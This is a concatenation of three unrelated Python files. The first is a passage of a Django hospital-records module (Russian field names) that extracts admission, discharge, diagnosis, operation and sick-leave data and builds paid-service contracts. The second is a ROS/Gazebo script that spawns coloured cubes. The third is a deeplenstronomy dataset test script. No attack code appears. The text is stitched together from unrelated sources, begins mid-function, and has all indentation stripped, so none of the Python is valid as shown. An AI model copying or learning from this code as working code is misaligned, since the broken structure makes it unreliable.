temp_dict_iss = temp_dict.copy()
temp_dict_iss['research_code'] = i.research.code
temp_dict_iss['research_title'] = i.research.title
temp_dict['purpose'] = empty if not i.purpose else i.purpose
temp_dict['is_first_reception'] = 'Да' if i.research.is_first_reception else 'Нет'
temp_dict['diagnos'] = empty if not i.diagnos else i.diagnos
temp_dict['first_time'] = 'Да' if i.first_time else 'Нет'
temp_dict['result_reception'] = empty if not i.result_reception else i.result_reception
temp_dict['outcome_illness'] = empty if not i.outcome_illness else i.outcome_illness
# Dispensary registration (D-registration) data
disp = DispensaryReg.objects.filter(Q(card=i.napravleniye.client), (Q(date_end=None) | Q(date_end=today)))
d_stand = []
d_take = []
d_stop = []
d_whystop = []
if disp:
for d in disp:
if d.date_end is None and d.date_start != i.time_confirmation.date():
date_start = strdate(d.date_start, short_year=True)
date_start = normalize_date(date_start)
d_stand.append(f'{d.diagnos}<br/>{date_start}<br/>')
elif d.date_end is None and d.date_start == i.time_confirmation.date():
d_take.append(d.diagnos)
elif d.date_end == i.time_confirmation.date():
d_stop.append(d.diagnos)
d_whystop.append(d.why_stop)
temp_dict['d_stand'] = '' if not d_stand else ''.join(d_stand)
temp_dict['d_take'] = '' if not d_take else ', '.join(d_take)
temp_dict['d_stop'] = '' if not d_stop else ', '.join(d_stop)
temp_dict['d_whystop'] = '' if not d_whystop else ', '.join(d_whystop)
temp_dict['maybe_onco'] = 'Да' if i.maybe_onco else ''
fin_source[dict_fsourcce].update({order: temp_dict})
fin_source_iss[dict_fsourcce].update({order: temp_dict_iss})
if Issledovaniya.objects.filter(parent=i).exists():
temp_dict_iss_copy = deepcopy(temp_dict_iss)
add_iss_dict = OrderedDict()
for iss in Issledovaniya.objects.filter(parent=i):
temp_dict_iss_copy['research_code'] = iss.research.code
temp_dict_iss_copy['research_title'] = iss.research.title
order = Decimal(str(order)) + Decimal('0.1')
add_iss_dict[order] = deepcopy(temp_dict_iss_copy)
fin_source_iss[dict_fsourcce].update(add_iss_dict)
return [fin_source, fin_source_iss]
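# Hedged usage sketch (illustrative only, not part of the original module): the
# two structures returned above are keyed first by finance source and then by
# visit order, so a report builder could walk them roughly like this:
#
#   fin_source, fin_source_iss = get_finaldata_talon(get_doc_results(doc, date))
#   for source_name, visits in fin_source.items():
#       for order, row in visits.items():
#           print(source_name, order, row['client_fio'], row['diagnos'])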
def primary_reception_get_data(hosp_first_num):
# Extract data from the primary admission record
hosp_primary_receptions = hosp_get_data_direction(hosp_first_num, site_type=0, type_service='None', level=2)
hosp_primary_iss, primary_research_id = None, None
if hosp_primary_receptions:
hosp_primary_iss = hosp_primary_receptions[0].get('iss')
primary_research_id = hosp_primary_receptions[0].get('research_id')
titles_field = [
'Дата поступления',
'Время поступления',
'Виды транспортировки',
'Побочное действие лекарств (непереносимость)',
'Кем направлен больной',
'Вид госпитализации',
'Время через, которое доставлен после начала заболевания, получения травмы',
'Диагноз направившего учреждения',
'Диагноз при поступлении',
'Госпитализирован по поводу данного заболевания',
'Общее состояние',
'Социальный статус',
'Категория льготности',
'Всего госпитализаций',
'Вид травмы',
'Группа крови',
'Резус принадлежность',
'Вес',
]
list_values = None
if titles_field and hosp_primary_receptions:
list_values = get_result_value_iss(hosp_primary_iss, primary_research_id, titles_field)
date_entered_value, time_entered_value, type_transport, medicament_allergy = '', '', '', ''
who_directed, plan_hospital, extra_hospital, type_hospital = '', '', '', ''
time_start_ill, diagnos_who_directed, diagnos_entered = '', '', ''
what_time_hospitalized, state, social_status, category_privilege = '', '', '', ''
all_hospitalized, type_trauma, blood_group, resus_factor = '', '', '', ''
weight = ''
if list_values:
for i in list_values:
if i[3] == 'Дата поступления':
date_entered_value = normalize_date(i[2])
continue
if i[3] == 'Время поступления':
time_entered_value = i[2]
continue
if i[3] == 'Виды транспортировки':
type_transport = i[2]
continue
if i[3] == 'Побочное действие лекарств (непереносимость)':
medicament_allergy = i[2]
continue
if i[3] == 'Кем направлен больной':
who_directed = i[2]
continue
if i[3] == 'Вид госпитализации':
type_hospital = i[2]
if type_hospital.lower() == 'экстренная':
time_start_ill_obj = get_result_value_iss(hosp_primary_iss, primary_research_id, ['Время через, которое доставлен после начала заболевания, получения травмы'])
if time_start_ill_obj:
time_start_ill = time_start_ill_obj[0][2]
extra_hospital = "Да"
plan_hospital = "Нет"
else:
plan_hospital = "Да"
extra_hospital = "Нет"
time_start_ill = ''
if i[3] == 'Диагноз направившего учреждения':
diagnos_who_directed = i[2]
continue
if i[3] == 'Диагноз при поступлении':
diagnos_entered = i[2]
continue
if i[3] == 'Госпитализирован по поводу данного заболевания':
what_time_hospitalized = i[2]
continue
if i[3] == 'Общее состояние':
state = i[2]
continue
if i[3] == 'Социальный статус':
social_status = i[2]
continue
if i[3] == 'Категория льготности':
category_privilege = i[2]
continue
if i[3] == 'Всего госпитализаций':
all_hospitalized = i[2]
continue
if i[3] == 'Вид травмы':
type_trauma = i[2]
continue
if i[3] == 'Группа крови':
blood_group = i[2]
continue
if i[3] == 'Резус принадлежность':
resus_factor = i[2]
continue
if i[3] == 'Вес':
weight = i[2]
continue
return {
'date_entered_value': date_entered_value,
'time_entered_value': time_entered_value,
'type_transport': type_transport,
'medicament_allergy': medicament_allergy,
'who_directed': who_directed,
'plan_hospital': plan_hospital,
'extra_hospital': extra_hospital,
'type_hospital': type_hospital,
'time_start_ill': time_start_ill,
'diagnos_who_directed': diagnos_who_directed,
'diagnos_entered': diagnos_entered,
'what_time_hospitalized': what_time_hospitalized,
'state': state,
'social_status': social_status,
'category_privilege': category_privilege,
'all_hospitalized': all_hospitalized,
'type_trauma': type_trauma,
'blood_group': blood_group,
'resus_factor': resus_factor,
'weight': weight,
}
def hosp_extract_get_data(hosp_last_num):
# Extract data from the discharge record
hosp_extract = hosp_get_data_direction(hosp_last_num, site_type=7, type_service='None', level=2)
if not hosp_extract:
return {}
hosp_extract_iss, extract_research_id, doc_confirm = None, None, None
if hosp_extract:
hosp_extract_iss = hosp_extract[0].get('iss')
doc_confirm = Issledovaniya.objects.get(pk=hosp_extract_iss).doc_confirmation
if not doc_confirm:
return {}
extract_research_id = hosp_extract[0].get('research_id')
titles_field = [
'Время выписки',
'Дата выписки',
'Основной диагноз (описание)',
'Основной диагноз по МКБ',
'Осложнение основного диагноза (описание)',
'Осложнение основного диагноза по МКБ',
'Сопутствующий диагноз (описание)',
'Сопутствующий диагноз по МКБ',
'Исход госпитализации',
'Результат госпитализации',
'Проведено койко-дней',
'Заведующий отделением',
'Палата №',
]
list_values = None
if titles_field and hosp_extract:
list_values = get_result_value_iss(hosp_extract_iss, extract_research_id, titles_field)
date_value, time_value = '', ''
final_diagnos, other_diagnos, near_diagnos, outcome, final_diagnos_mkb, other_diagnos_mkb, near_diagnos_mkb = '', '', '', '', '', '', ''
days_count, result_hospital, manager_depart, room_num = '', '', '', ''
if list_values:
for i in list_values:
if i[3] == 'Дата выписки':
date_value = normalize_date(i[2])
if i[3] == 'Время выписки':
time_value = i[2]
if i[3] == 'Основной диагноз (описание)':
final_diagnos = i[2]
if i[3] == 'Осложнение основного диагноза (описание)':
other_diagnos = i[2]
if i[3] == 'Сопутствующий диагноз (описание)':
near_diagnos = i[2]
if i[3] == 'Исход госпитализации':
outcome = i[2]
if i[3] == 'Результат госпитализации':
result_hospital = i[2]
if i[3] == 'Основной диагноз по МКБ':
final_diagnos_mkb = str(i[2])
if i[3] == 'Осложнение основного диагноза по МКБ':
other_diagnos_mkb = str(i[2]).split(' ')[0]
if i[3] == 'Сопутствующий диагноз по МКБ':
near_diagnos_mkb = str(i[2]).split(' ')[0]
if i[3] == 'Проведено койко-дней':
days_count = str(i[2])
if i[3] == 'Заведующий отделением':
manager_depart = str(i[2])
if i[3] == 'Палата №':
room_num = str(i[2])
doc_fio = doc_confirm.get_fio()
return {
'date_value': date_value,
'time_value': time_value,
'final_diagnos': final_diagnos,
'other_diagnos': other_diagnos,
'near_diagnos': near_diagnos,
'outcome': outcome,
'final_diagnos_mkb': final_diagnos_mkb,
'other_diagnos_mkb': other_diagnos_mkb,
'near_diagnos_mkb': near_diagnos_mkb,
'extract_iss': hosp_extract_iss,
'days_count': days_count,
'result_hospital': result_hospital,
'doc_fio': doc_fio,
'manager_depart': manager_depart,
'room_num': room_num,
}
def hosp_get_clinical_diagnos(hosp_obj):
clinic_diagnos = ''
tmp_clinic_diagnos = []
for i in hosp_obj:
hosp_diagnostic_epicris = hosp_get_data_direction(i['direction'], site_type=6, type_service='None', level=2)
day_entries_iss = []
day_entries_research_id = None
if hosp_diagnostic_epicris:
for i in hosp_diagnostic_epicris:
# find the diagnostic epicrisis protocols
if i.get('research_title').lower().find('диагностич') != -1:
day_entries_iss.append(i.get('iss'))
if not day_entries_research_id:
day_entries_research_id = i.get('research_id')
titles_field = ['Диагноз клинический', 'Дата установления диагноза', 'Основной', 'Осложнение', 'Сопутствующий']
list_values = []
if titles_field and day_entries_iss:
for i in day_entries_iss:
list_values.append(get_result_value_iss(i, day_entries_research_id, titles_field))
if list_values:
for fields in list_values:
clinical_data = {'clinic_diagnos': '', 'main_diagnos': '', 'other_diagnos': '', 'near_diagnos': '', 'date': ''}
for i in fields:
if i[3] == 'Дата установления диагноза':
clinical_data['date'] = normalize_date(i[2])
continue
if i[3] == 'Диагноз клинический':
clinical_data['clinic_diagnos'] = i[2]
continue
if i[3] == 'Основной':
clinical_data['main_diagnos'] = f"Основной: {i[2]}"
continue
if i[3] == 'Осложнение':
clinical_data['other_diagnos'] = f"; Осложнение: {i[2]}"
continue
if i[3] == 'Сопутствующий':
clinical_data['near_diagnos'] = f"; Сопутствующий: {i[2]}"
continue
if clinical_data['date'] and (clinical_data['clinic_diagnos'] or clinical_data['main_diagnos']):
tmp_clinic_diagnos.append(clinical_data.copy())
for i in tmp_clinic_diagnos:
clinic_diagnos = f"{clinic_diagnos}{i['clinic_diagnos']} <u>{i['main_diagnos']}</u>{i['other_diagnos']}{i['near_diagnos']}; дата: {i['date']}<br/>"
return clinic_diagnos
def hosp_get_transfers_data(hosp_nums_obj):
titles_field = ['Дата перевода', 'Время перевода']
date_transfer_value, time_transfer_value = '', ''
transfers = []
list_values = None
for i in range(len(hosp_nums_obj)):
if i == 0:
continue
transfer_research_title = hosp_nums_obj[i].get('research_title')
# for the current hosp_dir, get the epicrisis whose title contains "transfer..."
from_hosp_dir_transfer = hosp_nums_obj[i - 1].get('direction')
epicrisis_data = hosp_get_data_direction(from_hosp_dir_transfer, site_type=6, type_service='None', level=2)
if epicrisis_data:
result_check = check_transfer_epicrisis(epicrisis_data)
if result_check['iss']:
iss_transfer, research_id_transfer = result_check['iss'], result_check['research_id']
if titles_field and iss_transfer:
list_values = get_result_value_iss(iss_transfer, research_id_transfer, titles_field)
else:
continue
if list_values:
for i in list_values:
if i[3] == 'Дата перевода':
date_transfer_value = normalize_date(i[2])
continue
if i[3] == 'Время перевода':
time_transfer_value = i[2]
continue
transfers.append({'transfer_research_title': transfer_research_title, 'date_transfer_value': date_transfer_value, 'time_transfer_value': time_transfer_value})
return transfers
def hosp_patient_movement(hosp_nums_obj):
titles_field = ['Дата перевода']
patient_movement = []
list_values = None
for i in range(len(hosp_nums_obj)):
date_out, diagnos_mkb, doc_confirm_code = '', '', ''
bed_profile_research_title = hosp_nums_obj[i].get('research_title')
hosp_dir = hosp_nums_obj[i].get('direction')
primary_reception_data = primary_reception_get_data(hosp_dir)
hosp_extract_data = hosp_get_data_direction(hosp_dir, site_type=7, type_service='None', level=2)
if hosp_extract_data:
extract_data = hosp_extract_get_data(hosp_dir)
if extract_data:
date_out = extract_data['date_value']
diagnos_mkb = extract_data['final_diagnos_mkb']
extract_iss_obj = Issledovaniya.objects.get(pk=extract_data['extract_iss'])
doc_confirm_code = extract_iss_obj.doc_confirmation.personal_code if extract_iss_obj.doc_confirmation else None
list_values = None
epicrisis_data = hosp_get_data_direction(hosp_dir, site_type=6, type_service='None', level=2)
if epicrisis_data:
result_check = check_transfer_epicrisis(epicrisis_data)
if result_check['iss']:
iss_transfer, research_id_transfer = result_check['iss'], result_check['research_id']
if titles_field and iss_transfer:
list_values = get_result_value_iss(iss_transfer, research_id_transfer, titles_field)
if list_values:
for i in list_values:
if i[3] == 'Дата перевода':
date_out = normalize_date(i[2])
if i[3] == 'Клинический диагноз по МКБ':
diagnos_mkb = i[2]
patient_movement.append(
{
'bed_profile_research_title': bed_profile_research_title,
'date_entered_value': primary_reception_data['date_entered_value'],
'date_oute': date_out,
'diagnos_mkb': diagnos_mkb,
'doc_confirm_code': doc_confirm_code,
}
)
return patient_movement
def hosp_get_operation_data(num_dir):
hosp_operation = hosp_get_data_direction(num_dir, site_type=3, type_service='None', level=-1)
operation_iss_research = []
if hosp_operation:
for i in hosp_operation:
# find protocols of the operation/manipulation type
if (i.get('research_title').lower().find('операци') != -1 or i.get('research_title').lower().find('манипул') != -1) and i['date_confirm']:
operation_iss_research.append({'iss': i['iss'], 'research': i['research_id']})
titles_field = [
'Название операции',
'Дата проведения',
'Время начала',
'Время окончания',
'Метод обезболивания',
'Осложнения',
'Код операции',
'Код манипуляции',
'Оперативное вмешательство',
'Код анестезиолога',
'Категория сложности',
'Диагноз после оперативного лечения',
'МКБ 10',
'Оперировал',
'Код хирурга',
]
list_values = []
operation_result = []
if titles_field and operation_iss_research and hosp_operation:
for i in operation_iss_research:
list_values.append(get_result_value_iss(i['iss'], i['research'], titles_field))
operation_result = []
for fields_operation in list_values:
pk_iss_operation = fields_operation[0][1]
operation_data = {
'name_operation': '',
'date': '',
'time_start': '',
'time_end': '',
'anesthesia method': '',
'complications': '',
'doc_fio': '',
'code_operation': '',
'code_doc_anesthesia': '',
'plan_operation': '',
'diagnos_after_operation': '',
'mkb10': '',
'category_difficult': '',
'doc_code': '',
}
iss_obj = Issledovaniya.objects.filter(pk=pk_iss_operation).first()
if not iss_obj.time_confirmation:
continue
operation_data['doc_fio'] = iss_obj.doc_confirmation_fio
operation_data['doc_code'] = iss_obj.doc_confirmation.personal_code if iss_obj.doc_confirmation else None
if operation_data['doc_code'] == 0:
operation_data['doc_code'] = ''
category_difficult = ''
for field in fields_operation:
if field[3] == 'Название операции':
operation_data['name_operation'] = field[2]
continue
if field[3] == 'Дата проведения':
operation_data['date'] = normalize_date(field[2])
continue
if field[3] == 'Время начала':
operation_data['time_start'] = field[2]
continue
if field[3] == 'Время окончания':
operation_data['time_end'] = field[2]
continue
if field[3] == 'Метод обезболивания':
operation_data['anesthesia method'] = field[2]
continue
if field[3] == 'Осложнения':
operation_data['complications'] = field[2]
continue
if field[3] == 'Код операции':
operation_data['code_operation'] = field[2]
continue
if field[3] == 'Код манипуляции':
operation_data['code_operation'] = field[2]
continue
if field[3] == 'Код анестезиолога':
operation_data['code_doc_anesthesia'] = field[2]
continue
if field[3] == 'Оперативное вмешательство':
operation_data['plan_operation'] = field[2]
continue
if field[3] == 'Категория сложности':
operation_data['category_difficult'] = category_difficult = f"Сложность - {field[2]}"
continue
if field[3] == 'Диагноз после оперативного лечения':
operation_data['diagnos_after_operation'] = field[2]
continue
if field[3] == 'МКБ 10':
operation_data['mkb10'] = field[2]
continue
if field[3] == 'Оперировал':
if field[2]:
operation_data['doc_fio'] = field[2]
continue
if field[3] == 'Код хирурга':
if field[2]:
operation_data['doc_code'] = field[2]
continue
operation_data['name_operation'] = f"{operation_data['name_operation']} {category_difficult}"
operation_result.append(operation_data.copy())
return operation_result
def closed_bl(hosp_num_dir):
"""
Have sick-leave protocols containing the word "closure" been confirmed among the sick leaves (B/L)?
"""
result_bl = hosp_get_data_direction(hosp_num_dir, site_type=8, type_service='None', level=-1)
num, who_get, who_care, start_date, end_date, start_work = '', '', '', '', '', ''
for i in result_bl:
if i['date_confirm'] is None:
continue
if i["research_title"].lower().find('закрыт') != -1:
data_closed_bl = ParaclinicResult.objects.filter(issledovaniye=i['iss'])
for b in data_closed_bl:
if b.field.title == "Лист нетрудоспособности №":
num = b.value
continue
if b.field.title == "Выдан кому":
who_get = b.value
continue
if b.field.title == "по уходу за":
who_care = b.value
continue
if b.field.title == "выдан с":
start_date = b.value
if start_date.find('-') != -1:
start_date = normalize_date(start_date)
continue
if b.field.title == "по":
end_date = b.value
if end_date.find('-') != -1:
end_date = normalize_date(end_date)
continue
if b.field.title == "к труду":
start_work = b.value
if start_work.find('-') != -1:
start_work = normalize_date(start_work)
continue
return {'is_closed': True, 'num': num, 'who_get': who_get, 'who_care': who_care, 'start_date': start_date, 'end_date': end_date, 'start_work': start_work}
return {'is_closed': False, 'num': num, 'who_get': who_get, 'who_care': who_care, 'start_date': start_date, 'end_date': end_date, 'start_work': start_work}
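# Hedged usage sketch (the direction number is illustrative):
#
#   bl = closed_bl(hosp_num_dir)
#   if bl['is_closed']:
#       print(bl['num'], bl['start_date'], '-', bl['end_date'], 'to work:', bl['start_work'])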
def create_contract(ind_dir, card_pk):
ind_card = Card.objects.get(pk=card_pk)
# exec_person = request_data['user'].doctorprofile.get_full_fio()
patient_data = ind_card.get_data_individual()
p_agent = None
if ind_card.who_is_agent:
p_agent = getattr(ind_card, ind_card.who_is_agent)
p_payer = None
if ind_card.payer:
p_payer = ind_card.payer
# Get all finance sources whose title is exactly 'Платно' (paid)
ist_f = list(IstochnikiFinansirovaniya.objects.values_list('id').filter(title__exact='Платно'))
ist_f_list = [int(x[0]) for x in ist_f]
napr = Napravleniya.objects.filter(pk__in=ind_dir)
dir_temp = []
# Check that all directions belong to the same card and have the 'Платно' (paid) finance source
num_contract_set = set()
for n in napr:
if n.istochnik_f_id in ist_f_list and n.client == ind_card:
num_contract_set.add(n.num_contract)
dir_temp.append(n.pk)
if not dir_temp:
return False
# get the SERVICES for the directions (filtered as paid, with no saved studies) from Issledovaniya
research_direction = get_research_by_dir(dir_temp)
if not research_direction:
return False
# get the price for each direction's services from Issledovaniya
research_price = get_coast_from_issledovanie(research_direction)
# Build the final data structure
result_data = get_final_data(research_price)
sum_research = result_data[1]
# Checksum calculation: the sequence of direction ids + the total sum (monetary amount)
qr_napr = ','.join([str(elem) for elem in result_data[3]])
protect_val = sum_research.replace(' ', '')
bstr = (qr_napr + protect_val).encode()
protect_code = str(zlib.crc32(bstr))
today = utils.current_time()
date_now1 = datetime.datetime.strftime(today, '%y%m%d%H%M%S%f')[:-3]
date_now_str = str(ind_card.pk) + str(date_now1)
# Check whether the contract number and the checksum are already stored on the directions.
# Rewrite the contract number if the set of directions contains None, the directions reference different contracts,
# or the checksums differ: in those cases overwrite everything.
num_contract_set = set()
protect_code_set = set()
napr_end = Napravleniya.objects.filter(id__in=result_data[3])
for n in napr_end:
num_contract_set.add(n.num_contract)
protect_code_set.add(n.protect_code)
if (len(num_contract_set) == 1 and None in num_contract_set) or None in protect_code_set:
PersonContract.person_contract_save(date_now_str, protect_code, qr_napr, sum_research, patient_data['fio'], ind_card, p_payer, p_agent)
Napravleniya.objects.filter(id__in=result_data[3]).update(num_contract=date_now_str, protect_code=protect_code)
return PersonContract.pk
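# Hedged sketch (not part of the original code): shows how the CRC32-based
# protect_code written above could be recomputed later to verify that a stored
# contract still matches its directions and total sum. The helper name and its
# arguments are illustrative assumptions; zlib is assumed to be imported at the
# top of this module, since it is already used above.
def _example_verify_protect_code(direction_ids, sum_research, stored_protect_code):
    # Rebuild the same "direction ids + total sum without spaces" string and
    # compare its CRC32 with the stored value.
    qr_napr = ','.join(str(pk) for pk in direction_ids)
    protect_val = sum_research.replace(' ', '')
    recomputed = str(zlib.crc32((qr_napr + protect_val).encode()))
    return recomputed == stored_protect_code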
|
#!/usr/bin/env python
import rospy
from gazebo_msgs.srv import SpawnModel, SpawnModelRequest, SpawnModelResponse
# from gazebo_msgs.srv import ApplyBodyWrench, GetModelProperties, GetWorldProperties, SetModelState
from copy import deepcopy
from tf.transformations import quaternion_from_euler
sdf_cube = """<?xml version="1.0" ?>
<sdf version="1.4">
<model name="MODELNAME">
<static>0</static>
<link name="link">
<inertial>
<mass>1.0</mass>
<inertia>
<ixx>0.01</ixx>
<ixy>0.0</ixy>
<ixz>0.0</ixz>
<iyy>0.01</iyy>
<iyz>0.0</iyz>
<izz>0.01</izz>
</inertia>
</inertial>
<collision name="stairs_collision0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<surface>
<bounce />
<friction>
<ode>
<mu>1.0</mu>
<mu2>1.0</mu2>
</ode>
</friction>
<contact>
<ode>
<kp>10000000.0</kp>
<kd>1.0</kd>
<min_depth>0.0</min_depth>
<max_vel>0.0</max_vel>
</ode>
</contact>
</surface>
</collision>
<visual name="stairs_visual0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<material>
<script>
<uri>file://media/materials/scripts/gazebo.material</uri>
<name>Gazebo/Blue</name>
</script>
</material>
</visual>
<velocity_decay>
<linear>0.000000</linear>
<angular>0.000000</angular>
</velocity_decay>
<self_collide>0</self_collide>
<kinematic>0</kinematic>
<gravity>1</gravity>
</link>
</model>
</sdf>
"""
sdf_dummy_cube = """<?xml version="1.0" ?>
<sdf version="1.4">
<model name="MODELNAME">
<static>0</static>
<link name="link">
<inertial>
<mass>1.0</mass>
<inertia>
<ixx>0.01</ixx>
<ixy>0.0</ixy>
<ixz>0.0</ixz>
<iyy>0.01</iyy>
<iyz>0.0</iyz>
<izz>0.01</izz>
</inertia>
</inertial>
<collision name="stairs_collision0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<surface>
<bounce />
<friction>
<ode>
<mu>10.0</mu>
<mu2>10.0</mu2>
</ode>
</friction>
<contact>
<ode>
<kp>10000000.0</kp>
<kd>1.0</kd>
<min_depth>0.0</min_depth>
<max_vel>0.0</max_vel>
</ode>
</contact>
</surface>
</collision>
<visual name="stairs_visual0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<material>
<script>
<uri>file://media/materials/scripts/gazebo.material</uri>
<name>Gazebo/White</name>
</script>
</material>
</visual>
<velocity_decay>
<linear>0.000000</linear>
<angular>0.000000</angular>
</velocity_decay>
<self_collide>0</self_collide>
<kinematic>0</kinematic>
<gravity>1</gravity>
</link>
</model>
</sdf>
"""
sdf_cube_blue = """<?xml version="1.0" ?>
<sdf version="1.4">
<model name="MODELNAME">
<static>0</static>
<link name="link">
<inertial>
<mass>1.0</mass>
<inertia>
<ixx>0.01</ixx>
<ixy>0.0</ixy>
<ixz>0.0</ixz>
<iyy>0.01</iyy>
<iyz>0.0</iyz>
<izz>0.01</izz>
</inertia>
</inertial>
<collision name="stairs_collision0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<surface>
<bounce />
<friction>
<ode>
<mu>10.0</mu>
<mu2>10.0</mu2>
</ode>
</friction>
<contact>
<ode>
<kp>10000000.0</kp>
<kd>1.0</kd>
<min_depth>0.0</min_depth>
<max_vel>0.0</max_vel>
</ode>
</contact>
</surface>
</collision>
<visual name="stairs_visual0">
<geometry>
<mesh>
<uri>file://box_qr.obj</uri>
</mesh>
</geometry>
</visual>
<velocity_decay>
<linear>0.000000</linear>
<angular>0.000000</angular>
</velocity_decay>
<self_collide>0</self_collide>
<kinematic>0</kinematic>
<gravity>1</gravity>
</link>
</model>
</sdf>
"""
sdf_cube_green = """<?xml version="1.0" ?>
<sdf version="1.4">
<model name="MODELNAME">
<static>0</static>
<link name="link">
<inertial>
<mass>1.0</mass>
<inertia>
<ixx>0.01</ixx>
<ixy>0.0</ixy>
<ixz>0.0</ixz>
<iyy>0.01</iyy>
<iyz>0.0</iyz>
<izz>0.01</izz>
</inertia>
</inertial>
<collision name="stairs_collision0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<surface>
<bounce />
<friction>
<ode>
<mu>10.0</mu>
<mu2>10.0</mu2>
</ode>
</friction>
<contact>
<ode>
<kp>10000000.0</kp>
<kd>1.0</kd>
<min_depth>0.0</min_depth>
<max_vel>0.0</max_vel>
</ode>
</contact>
</surface>
</collision>
<visual name="stairs_visual0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<material>
<script>
<uri>file://media/materials/scripts/gazebo.material</uri>
<name>Gazebo/Green</name>
</script>
</material>
</visual>
<velocity_decay>
<linear>0.000000</linear>
<angular>0.000000</angular>
</velocity_decay>
<self_collide>0</self_collide>
<kinematic>0</kinematic>
<gravity>1</gravity>
</link>
</model>
</sdf>
"""
sdf_cube_red = """<?xml version="1.0" ?>
<sdf version="1.4">
<model name="MODELNAME">
<static>0</static>
<link name="link">
<inertial>
<mass>1.0</mass>
<inertia>
<ixx>0.01</ixx>
<ixy>0.0</ixy>
<ixz>0.0</ixz>
<iyy>0.01</iyy>
<iyz>0.0</iyz>
<izz>0.01</izz>
</inertia>
</inertial>
<collision name="stairs_collision0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<surface>
<bounce />
<friction>
<ode>
<mu>10.0</mu>
<mu2>10.0</mu2>
</ode>
</friction>
<contact>
<ode>
<kp>10000000.0</kp>
<kd>1.0</kd>
<min_depth>0.0</min_depth>
<max_vel>0.0</max_vel>
</ode>
</contact>
</surface>
</collision>
<visual name="stairs_visual0">
<pose>0 0 0 0 0 0</pose>
<geometry>
<box>
<size>SIZEXYZ</size>
</box>
</geometry>
<material>
<script>
<uri>file://media/materials/scripts/gazebo.material</uri>
<name>Gazebo/Red</name>
</script>
</material>
</visual>
<velocity_decay>
<linear>0.000000</linear>
<angular>0.000000</angular>
</velocity_decay>
<self_collide>0</self_collide>
<kinematic>0</kinematic>
<gravity>1</gravity>
</link>
</model>
</sdf>
"""
def create_cube_request(sdf_model, modelname, px, py, pz, rr, rp, ry, sx, sy, sz):
"""Create a SpawnModelRequest with the parameters of the cube given.
modelname: name of the model for gazebo
px py pz: position of the cube (and its collision cube)
rr rp ry: rotation (roll, pitch, yaw) of the model
sx sy sz: size of the cube"""
cube = deepcopy(sdf_model)
# Replace size of model
size_str = str(round(sx, 3)) + " " + \
str(round(sy, 3)) + " " + str(round(sz, 3))
cube = cube.replace('SIZEXYZ', size_str)
# Replace modelname
cube = cube.replace('MODELNAME', str(modelname))
req = SpawnModelRequest()
req.model_name = modelname
req.model_xml = cube
req.initial_pose.position.x = px
req.initial_pose.position.y = py
req.initial_pose.position.z = pz
q = quaternion_from_euler(rr, rp, ry)
req.initial_pose.orientation.x = q[0]
req.initial_pose.orientation.y = q[1]
req.initial_pose.orientation.z = q[2]
req.initial_pose.orientation.w = q[3]
return req
if __name__ == '__main__':
rospy.init_node('spawn_models')
spawn_srv = rospy.ServiceProxy('/gazebo/spawn_sdf_model', SpawnModel)
rospy.loginfo("Waiting for /gazebo/spawn_sdf_model service...")
spawn_srv.wait_for_service()
rospy.loginfo("Connected to service!")
rospy.sleep(5)
# Spawn Box
req1 = create_cube_request(sdf_cube_red, "packagen1",
-0.8, 1.80, 1.0, # position -x 1.2 -y -2.5 -z 0.94
0.0, 0.0, 0.0, # rotation
0.15, 0.15, 0.15) # size
req2 = create_cube_request(sdf_cube_green, "packagen2",
-0.66, 2.80, 1.0, # position -x 1.2 -y -2.5 -z 0.94
0.0, 0.0, 0.0, # rotation
0.15, 0.15, 0.15) # size
req3 = create_cube_request(sdf_cube_blue, "packagen3",
-0.90, 3.80, 1.0, # position -x 1.2 -y -2.5 -z 0.94
0.0, 0.0, 0.0, # rotation
0.15, 0.15, 0.15) # size
rospy.sleep(1)
spawn_srv.call(req1)
rospy.sleep(1)
spawn_srv.call(req2)
rospy.sleep(1)
spawn_srv.call(req3)
rospy.sleep(1.0)
|
"""
Parsed Config File Produces Expected Behaviors - configurations
"""
import inspect
import os
import deeplenstronomy.deeplenstronomy as dl
doc = """
\tRunning tests from test_expected_behaviors_configurations.py
\tThe tests included in this module demonstrate that the properties of each
\tconfiguration were simulated as expected. These properties include the
\texpected size of each configuration, the objects and planes included, and
\twhether time-series functionalities appear as expected. The functions are:
\t\t- test_configuration_existence
\t\t\tTesting that all configurations present in the config file are found by
\t\t\tdeeplenstronomy and are present in the simulation outputs
\t\t- test_configuration_fractions
\t\t\tTesting that the FRACTION keyword for each configuration resulted in
\t\t\tthe expected number of images for that configuration being produced
\t\t- test_timeseries
\t\t\tTime-series functionalities, if present, get tested by the function
\t\t\ttest_configuration_fractions
\t\t- test_planes_and_objects
\t\t\tTesting that each specified object and plane was included in the
\t\t\tsimulation and is present in the metadata corresponding to its
\t\t\tconfiguration
"""
print(doc)
# Below are all of the possible operation modes
kwargs_sets = {0: {}, # default arguments
1: {'save_to_disk': True},
2: {'save_to_disk': True, 'image_file_format': 'h5'},
3: {'save_to_disk': True, 'skip_image_generation': True},
4: {'store_in_memory': False},
5: {'store_sample': True},
6: {'skip_image_generation': True, 'survey': 'des'},
7: {'solve_lens_equation': True},
8: {'return_planes': True}
}
f = open('status.txt', 'r')
current_test = int(f.read().strip())
f.close()
# Generate the dataset
kwargs_set = kwargs_sets[current_test]
config_filename = 'config.yaml'
dataset = dl.make_dataset(config_filename, **kwargs_set)
has_images = [hasattr(dataset, x + '_images') for x in dataset.configurations]
has_metadata = [hasattr(dataset, x + '_metadata')
for x in dataset.configurations]
has_planes = [hasattr(dataset, x + '_planes') for x in dataset.configurations]
images_exist = [os.path.exists(dataset.outdir +'/' + x + '_images.' +
dataset.arguments['image_file_format'])
for x in dataset.configurations]
metadata_exist = [os.path.exists(dataset.outdir +'/' + x + '_metadata.csv')
for x in dataset.configurations]
